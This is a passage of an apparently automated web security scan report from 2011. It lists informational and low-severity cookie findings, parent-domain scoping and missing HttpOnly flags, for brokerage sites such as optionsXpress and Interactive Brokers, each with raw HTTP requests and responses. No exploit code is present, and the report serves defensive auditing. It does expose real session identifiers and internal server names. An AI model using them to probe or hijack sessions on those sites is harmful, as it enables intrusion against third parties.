   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.98. http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /promos/experience_an_options_specialist.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=DF3642BF4CCA46E3BCB4B2AC904A07B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Options tradin
...[SNIP]...

9.99. http://www.optionsxpress.com/promos/none

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /promos/none

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promos/none HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; TLTHID=FB0DC0464C7379B04E0F409D15B5A47F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D05DC917430831B031060D84F9F27197; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:45 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.100. http://www.optionsxpress.com/security_risks/disclosures.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/disclosures.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/disclosures.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41170
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FED853FE416DB0F03FEDDCB469A9145C; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.101. http://www.optionsxpress.com/security_risks/docs/privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/docs/privacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/docs/privacy.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=4C2659034820370B6A9DFB9CB9AA0744; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.102. http://www.optionsxpress.com/security_risks/financial_statement.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/financial_statement.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/financial_statement.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=65005755437004387D7FFBBE530F7372; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:41 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.103. http://www.optionsxpress.com/security_risks/risks_policies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/risks_policies.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/risks_policies.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19725
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=DB249C1A430D3C4503D85E86687565CD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.104. http://www.optionsxpress.com/security_risks/security_center.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /security_risks/security_center.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security_risks/security_center.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15926
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=E2BEAFED437171EB820D4E98385DB156; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.105. http://www.optionsxpress.com/tools_research/ox_mobile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /tools_research/ox_mobile.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools_research/ox_mobile.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15747
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FD7A328447D092AF8488C6A5531FE92B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.106. http://www.optionsxpress.com/tools_research/powerful_tools.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /tools_research/powerful_tools.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools_research/powerful_tools.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=2E2574AB41F5BC605C9F9897C3432558; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.107. http://www.optionsxpress.com/tools_research/xtend_2.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /tools_research/xtend_2.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools_research/xtend_2.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15806
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=3E3E48CF4431C4E5425025B2B98DADD9; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.108. http://www.optionsxpress.com/what_we_offer/free_account_transfers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /what_we_offer/free_account_transfers.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /what_we_offer/free_account_transfers.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15093
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=ECD9E2464BC899B5DEA91BB4AFEB72A7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:43 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.109. http://www.optionsxpress.com/why_ox/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /why_ox/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why_ox/ HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23885
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=3CFE0203443873E7E1112FA21AEBCE4E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.110. https://www.optionsxpress.com/downloads/financial_services_guide.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /downloads/financial_services_guide.pdf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /downloads/financial_services_guide.pdf HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 18626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: TLTHID=D480F472402E51465C012E9BFA1894F1; Path=/; Domain=.optionsxpress.com
HostName: DAWEB29
Set-Cookie: TLTCNT=DAWEB290000000000191854
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title value="WC@FIRMNAME">optionsXpress | We're sorry but that request canno
...[SNIP]...

9.111. https://www.optionsxpress.com/login.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /login.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:54 GMT
Location: https://www.optionsxpress.com/login.asp?r=1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1B1DD000453D0D2ED80148A6B79D7F5A; Path=/; Domain=.optionsxpress.com
HostName: DAWEB23
Set-Cookie: TLTCNT=DAWEB230000000000085881
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.optionsxpress.com/login.asp?r=1">here</a>.</body>

9.112. https://www.optionsxpress.com/welcome.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionsxpress.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/
Set-Cookie: TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com
HostName: DAWEB25
Set-Cookie: TLTCNT=DAWEB250000000000012272
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close


9.113. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: GEO (domain=.youtube.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:46:53 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=cfbdccd9bf80df90c1b6157efb90bfb7cwsAAAAzVVMyF3tqTmkbrQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pUVNrNDJCdG9CVTBISXc2OTNYTFVNSS02YXJpWlk1VHh2LXFXVXZiazg1QkgyREs0cjIwc29R -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 148 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://pixel.everesttech.net/2164/cq

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2164/cq

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: everest_session_v2 and everest_g_v2. One of these cookies (highlighted in the original report) appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2164/cq?ev_sid=3&ev_ln=futures%20options&ev_crx=7551788913&ev_mt=b&ev_n=g&ev_ltx=&ev_pl=&url=http%3A//www.optionsxpress.com/promos/experience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Set-Cookie: everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Fri, 13-Sep-2030 06:04:37 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
Content-Length: 348
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.optionsxpress.com/promos/experience_
...[SNIP]...

10.2. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/AccountAccess.Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID (set twice in this response). The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Universal/servlet/AccountAccess.Login HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:10 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D24B4AC443B91EEF9FD5C3E648B0EBBA.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=FA1637BB4C1210749D198C9C6CCCF2EA.www3; Path=/Universal; Secure
Content-Language: en
Content-Length: 16505
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

10.3. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/AccountAccess.Logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID (set three times in this response). The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Universal/servlet/AccountAccess.Logout HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:47:11 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A55CBF6DD6AC2BCEDB63CB76F1C14DC5.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=BCEA933607F5BEC843FF7E88BA2DBC25.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=56A61A82D2AFCE5A9F25ACEB787F17D3.www3; Path=/Universal; Secure
Content-Language: en
Content-Length: 16505
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

10.4. https://www.interactivebrokers.com/Universal/servlet/Registration_v3.formScreenPreReg

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/Registration_v3.formScreenPreReg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Universal/servlet/Registration_v3.formScreenPreReg HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:49:02 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9EFAFD90AB6C579C982FF58ACD7FDDB3.www3; Path=/Universal; Secure
Content-Language: en-US
Content-Length: 77915
Connection: close
Content-Type: text/html;charset=UTF-8


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
...[SNIP]...

10.5. https://www.interactivebrokers.com/Universal/servlet/formWelcome

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/formWelcome

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Universal/servlet/formWelcome?p=100&atype=IT&b=T&ft=ft1 HTTP/1.1
Host: www.interactivebrokers.com
Connection: keep-alive
Referer: http://www.interactivebrokers.com/en/p.php?f=individualAccounts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:37:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4FB23AA05D9909D5450906B08631151D.www3; Path=/Universal; Secure
Content-Language: en-US
Content-Length: 78633
Connection: close
Content-Type: text/html;charset=UTF-8


